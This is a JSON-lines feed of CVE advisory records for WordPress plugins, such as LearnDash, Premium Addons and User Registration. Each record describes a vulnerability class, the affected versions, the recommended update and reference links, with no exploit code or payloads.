{"CVE_ID":"CVE-2024-1208","slug":"sfwd-lms","versionImpact":"4.10.2","versionEndExcluding":"4.10.3","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.","recommendation":"Update to version 4.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3885","slug":"premium-addons-for-elementor","versionImpact":"4.10.28","versionEndExcluding":"4.10.29","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the subcontainer value parameter in all versions up to, and including, 4.10.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4111ba11-ad79-466a-9669-3c35730a331a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4111ba11-ad79-466a-9669-3c35730a331a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075668%40premium-addons-for-elementor%2Ftrunk&old=3066988%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075668%40premium-addons-for-elementor%2Ftrunk&old=3066988%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3647","slug":"premium-addons-for-elementor","versionImpact":"4.10.28","versionEndExcluding":"4.10.29","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post ticker widget in all versions up to, and including, 4.10.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the premium version of the plugin to be installed and activated in order to be exploited.","recommendation":"Update to version 4.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fdece5-2996-426f-b77c-ae0b35bcd0ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48fdece5-2996-426f-b77c-ae0b35bcd0ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075668\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-post-ticker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075668\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-post-ticker.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2399","slug":"premium-addons-for-elementor","versionImpact":"4.10.23","versionEndExcluding":"4.10.24","description":"The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc057069-15cd-477f-9106-e616e919c62f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc057069-15cd-477f-9106-e616e919c62f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.23\\\/widgets\\\/premium-media-wheel.php#L2753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.23\\\/widgets\\\/premium-media-wheel.php#L2753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051259\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-media-wheel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051259\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-media-wheel.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1680","slug":"premium-addons-for-elementor","versionImpact":"4.10.21","versionEndExcluding":"4.10.22","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Settings URL of the Banner, Team Members, and Image Scroll widgets in all versions up to, and including, 4.10.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2d0b38-8241-456f-a79b-5d31132b3233?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041548\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3041548\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2256","slug":"oik","versionImpact":"4.10.0","versionEndExcluding":"4.10.2","description":"The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.oik-plugins.com\\\/shortcode_example\\\/bw_contact_button-security-fix\\\/\",\"name\":\"https:\\\/\\\/www.oik-plugins.com\\\/shortcode_example\\\/bw_contact_button-security-fix\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1210","slug":"sfwd-lms","versionImpact":"4.10.1","versionEndExcluding":"4.10.2","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1208-and-CVE-2024-1210\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1209","slug":"sfwd-lms","versionImpact":"4.10.1","versionEndExcluding":"4.10.2","description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.","recommendation":"Update to version 4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/www.learndash.com\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1209\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-1209\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0326","slug":"premium-addons-for-elementor","versionImpact":"4.10.18","versionEndExcluding":"4.10.19","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output escaping on user supplied links. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-button.php#L1709\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-button.php#L1709\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022824\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022824\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-wrapper-link\\\/module.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4857","slug":"newsletters-lite","versionImpact":"4.9.9.9","versionEndExcluding":"4.10","description":"The Newsletters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.9.9 via the 'file' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/wp-mailinglist.php#L1584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/trunk\\\/wp-mailinglist.php#L1584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303758\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303758\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c0838a-5f86-4368-8bf9-da0582acbabf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c0838a-5f86-4368-8bf9-da0582acbabf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1467","slug":"astra-sites","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.1.6 via the ai_api_request(). This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074863\\\/astra-sites\\\/tags\\\/4.1.7\\\/inc\\\/classes\\\/class-astra-sites-importer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf5075f9-9658-4a09-bd38-34a72f6560f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf5075f9-9658-4a09-bd38-34a72f6560f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6889","slug":"secure-copy-content-protection","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9651abd1-0f66-418e-85a7-2de0c5e91bed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9651abd1-0f66-418e-85a7-2de0c5e91bed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6888","slug":"secure-copy-content-protection","versionImpact":"4.1.6","versionEndExcluding":"4.1.7","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4df74c2-4c95-4d1c-97c1-ebfc225f6b93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4df74c2-4c95-4d1c-97c1-ebfc225f6b93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6665","slug":"kbucket","versionImpact":"4.1.5","versionEndExcluding":"4.1.6","description":"The KBucket: Your Curated Content in WordPress plugin before 4.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3335f-6e04-402f-8cfd-fc4c62e52168\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3335f-6e04-402f-8cfd-fc4c62e52168\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6667","slug":"kbucket","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The KBucket: Your Curated Content in WordPress plugin before 4.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2b8ca6c-2b14-4d72-8e39-0f3ca5c23f56\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2b8ca6c-2b14-4d72-8e39-0f3ca5c23f56\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13146","slug":"booknetic","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Booknetic WordPress plugin before 4.1.5 does not have CSRF check when creating Staff accounts, which could allow attackers to make logged in admin add arbitrary Staff members via a CSRF attack","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cb40dd-53b0-46db-beb0-1841e385ce09\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19cb40dd-53b0-46db-beb0-1841e385ce09\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6737","slug":"enable-media-replace","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Enable Media Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the SHORTPIXEL_DEBUG parameter in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploiting this vulnerability requires the attacker to know the ID of an attachment uploaded by the user they are attacking.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c37d8218-6059-46f2-a5d9-d7c22486211e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c37d8218-6059-46f2-a5d9-d7c22486211e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010103%40enable-media-replace%2Ftrunk&old=2990561%40enable-media-replace%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010103%40enable-media-replace%2Ftrunk&old=2990561%40enable-media-replace%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4543","slug":"shortcode-variables","versionImpact":"4.1.4","versionEndExcluding":"4.1.5","description":"The Snippet Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.1.4. This is due to missing or incorrect nonce validation when adding or editing shortcodes. This makes it possible for unauthenticated attackers to modify shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/127b20c4-cd7c-4d04-b32f-bcc26beb2c35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/127b20c4-cd7c-4d04-b32f-bcc26beb2c35?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110951?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110951?contextall=1\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-0970","slug":"user-activity-tracking-and-log","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"This User Activity Tracking and Log WordPress plugin before 4.1.4 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7df6877c-6640-41be-aacb-20c7da61e4db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7df6877c-6640-41be-aacb-20c7da61e4db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13374","slug":"wp-table-manager","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The WP Table Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on thewptm_getFolders AJAX action in all versions up to, and including, 4.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary file names and directories.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.joomunited.com\\\/wordpress-products\\\/wp-table-manager\",\"name\":\"https:\\\/\\\/www.joomunited.com\\\/wordpress-products\\\/wp-table-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128bc7ee-9763-415f-b726-0e63d4b62271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128bc7ee-9763-415f-b726-0e63d4b62271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3292","slug":"user-registration","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.3 via the user_registration_update_profile_details() due to missing validation on the 'user_id' user controlled key. This makes it possible for unauthenticated attackers to update other user's passwords, if they have access to the user ID and email.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/includes\\\/class-ur-ajax.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/includes\\\/class-ur-ajax.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a63cd8-9d33-4a2c-a499-5b1ee38c07d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a63cd8-9d33-4a2c-a499-5b1ee38c07d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3282","slug":"user-registration","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.3 via the user_registration_membership_register_member() due to missing validation on the 'membership_id' user controlled key. This makes it possible for unauthenticated attackers to update any user's membership to any other active or non-active membership type.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268617\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c525b41c-dca5-442a-927e-4583cb303ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c525b41c-dca5-442a-927e-4583cb303ed1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11203","slug":"embedpress","versionImpact":"4.1.3","versionEndExcluding":"4.1.4","description":"The EmbedPress \u2013 Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018provider_name parameter in all versions up to, and including, 4.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/EmbedPress\\\/Shortcode.php#L240\",\"name\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/EmbedPress\\\/Shortcode.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/vendor\\\/wpdevelopers\\\/embera\\\/src\\\/Embera\\\/ProviderCollection\\\/ProviderCollectionAdapter.php#L173\",\"name\":\"https:\\\/\\\/github.com\\\/WPDevelopers\\\/embedpress\\\/blob\\\/a6aa3339d9dc69ab6f9338ded073e5709173c2d4\\\/vendor\\\/wpdevelopers\\\/embera\\\/src\\\/Embera\\\/ProviderCollection\\\/ProviderCollectionAdapter.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196371\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196371\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/167dedfa-36cc-4b01-8ea4-8eda8742953c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/167dedfa-36cc-4b01-8ea4-8eda8742953c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
